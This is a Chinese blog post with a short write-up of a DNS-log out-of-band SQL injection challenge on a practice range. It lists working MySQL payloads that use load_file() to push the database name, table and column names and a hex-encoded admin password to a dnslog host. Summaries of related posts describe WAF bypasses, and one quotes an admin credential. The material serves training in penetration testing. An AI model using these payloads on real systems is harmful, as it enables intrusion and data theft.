封神台sql靶场 dns_log 注入

最新推荐文章于 2024-02-21 21:59:35 发布
最新推荐文章于 2024-02-21 21:59:35 发布
阅读量253 收藏 1
点赞数
分类专栏: 封神台靶场 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46578840/article/details/118228979
版权

前提:目标数据库允许load_file()

1 and 1=1 //正常
1 and 1=2 //页面错误,存在注入
1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了
构造poyload
1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc')))
1+and+(select+load_file(concat('//',(select+table_name+from+information_schema.tables+where+table_schema=database()limit+0,1),'.pu9n3b.dnslog.cn/1.txt'))) //读表
1+and+(select+load_file(concat('//',(select+column_name+from+information_schema.columns+where+table_name='admin'limit+0,1),'.pu9n3b.dnslog.cn/1.txt'))) //读字段
1+and+(select+load_file(concat('//',(select+hex(password)+from+admin+limit+0,1),'.pu9n3b.dnslog.cn/1.txt')))  //读password字段第一个值

在这里插入图片描述
在这里插入图片描述字段值
在这里插入图片描述
在这里插入图片描述

星星明亮
关注
专栏目录
神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1163
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
Dns注入
笔墨稠思
11-25 2269
Dns注入(windowns服务器(支持smb服务) mysql数据库) 在我们发送请求时,将域名转换为对应的ip 例如 https://baidu.com 他会将这个域名解析为后面这串数字 220.181.38.251,从而帮助我们找到百度的服务器 Dns注入的原理 在我们对这个域名进行请求,Dns对这个域名进行解析时,可能会在日志中记录请求方的ip和请求的目录,我们可以通过子查询,将我们想要的内容拼接到域名内,让load_file()去访问共享文件,此时,被访问的域名被记录,此时可以去查看Dns服务
神台 dnslog注入
weixin_43836174的博客
08-27 657
靶场地址:http://59.63.200.79:8022/cat/?id=1 第一步 注入点寻找 寻找注入点,初步判断id=1处为注入点 尝试 试用 and 1=1 返回成功 1=2 报错 第二步 初步测试注入 找到注入点试用 order by n 查询 ![](https://nc0.cdn.zkaq.cn/md/6263/bdf6430495304a773942341564db2105_12336.png) 发现可以回显的字符是2为 使用 union select 1,...
mysql——dns注入靶场
weixin_45540609的博客
04-20 241
因为在?id=1 and 1=2时,waf设置了过滤规则,所以要考虑绕过规则 apache的解析是从右往左的,当右边第一个文件不存在的时候会跳过,从而解析第二个文件 于是在url后添加一个不存在的1.txt,然后输入?id=1 and 1=1 和?id=1 and 1=2时页面回显正常了,且表示存在sql注入dnslog上获取一个域名 o6bif7.dnslog.cn 利用dns注入 输入1.txt?id=1and(selectload_file(concat('//',...
神台靶场
m0_71518346的博客
10-18 701
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
SQL注入DNS_log注入
weixin_47785246的博客
07-11 881
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 851
今天给大家带来神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 957
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1615
1
神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1401
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 250
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2229
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLog在MySQL注入
mysql注入dns注入
seek_2022的博客
05-03 2252
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
神台靶场跑不了爆破,临时解决办法(亲测有效)
hackzkaq的博客
04-19 3479
最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题,我们不能改变环境的情况下,我们就去适应环境 那么绕过防护的方法目前能实现的就只有两个 1、降低访问频率 2、每次访问使用不同的ip 这两种方法我都帮同学们去实践了,你们按照我测出来的方法直接用就好 第一种,降低访问频率 这种方法目前只在靶场有效,实战中需要根据目标站点的具体防护进行测试 在burp跑爆破的时候,我们需要设置线程数 靶场我在经历过无数次被ban以后,测试出
DNSlog注入学习(靶场测试全流程)
00勇士王子的博客
04-18 1201
原理: 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。 DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息 利用场景: 在sql注入时为布尔盲注、时间盲注,注入的效率
web漏洞-渗透测试-加密解密注入-二次注入-DNSlog带外注入-中转注入-附SQLi-LABS靶场操作示例
ran的博客
01-18 748
加解密注入就是比常规注入多了一步,需要对网站加密方式进行还原,在注入过程中,所有的注入语句要按照网站的加密方式进行加密后再进行注入DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。sqlmap工具;BurpSuit抓包;SQLi-LABS靶场
神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1132
1111
sql-labs 回显注入+盲注+dnslog注入
Khazking的博客
11-27 3474
1.字符串:单引号'闭合 判断注入类型 id=1 id=1 and 1=2 id=1' 说明为字符型注入 id=-1' --+ 说明sql为单引号闭合 id=1'order by 3正常 id=1' order by 4报错 判断字段数为3 id=-1' union select 1,2,3 判断可利用字段数 爆库:d=-1' union select 1,database(),3--+ 爆表:id=-1' union select 1,table_...
SQL注入DNSLog外带注入
最新发布
dragon的博客
02-21 2874
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
#error "Unexpected value for SIZEOF_UNSIGNED_LONG"
05-23
这个错误通常是由于编译器或预处理器出现问题导致的。可能是因为在编译过程中使用了错误的编译标志或编译器版本过低。你可以尝试检查编译器的版本和编译标志是否正确,并更新到最新版本。如果问题仍然存在,你可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值